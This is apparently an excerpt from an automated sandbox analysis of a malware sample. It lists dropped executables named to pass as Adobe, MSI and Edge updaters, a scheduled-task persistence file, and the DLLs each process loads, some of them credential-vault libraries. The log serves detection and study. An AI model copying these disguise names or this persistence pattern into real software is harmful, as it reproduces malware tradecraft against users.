                          Source: KFLpYwMPXjapw3SVf9HA.exe, 0000000B.00000000.2305248683.0000000000102000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cb9be037-d
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: .idata
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: .idata
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .idata
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: .idata
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .idata
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .idata
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: .idata
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: .idata
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: .idata
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .idata
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .idata
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .idata
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: .idata
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .idata
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: .idata
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: .idata
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: .idata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile created: C:\Windows\Tasks\explorgu.job
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: String function: 00099C70 appears 36 times
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 00A59C70 appears 36 times
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: ladas[1].exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Data appended to the last section found
                          Source: ladas[1].exe.0.drStatic PE information: Data appended to the last section found
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoffDef.exe. vs I2jCDr35mu.exe
                          Source: I2jCDr35mu.exe, 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMSBuild.exeR vs I2jCDr35mu.exe
                          Source: I2jCDr35mu.exe, 00000000.00000002.2739590516.0000000004B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSBuild.exeR vs I2jCDr35mu.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winmm.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wininet.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: devobj.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: webio.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: schannel.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: vaultcli.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wldp.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: profapi.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: netutils.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: propsys.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: edputil.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: slc.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: userenv.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: sppc.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: linkinfo.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntshrui.dll
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cscapi.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: propsys.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: edputil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: appresolver.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: bcp47langs.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: slc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sppc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: propsys.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: edputil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: appresolver.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: bcp47langs.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: slc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sppc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.shell.servicehostbuilder.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: mlang.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: policymanager.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: msvcp110_win.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wintypes.dll
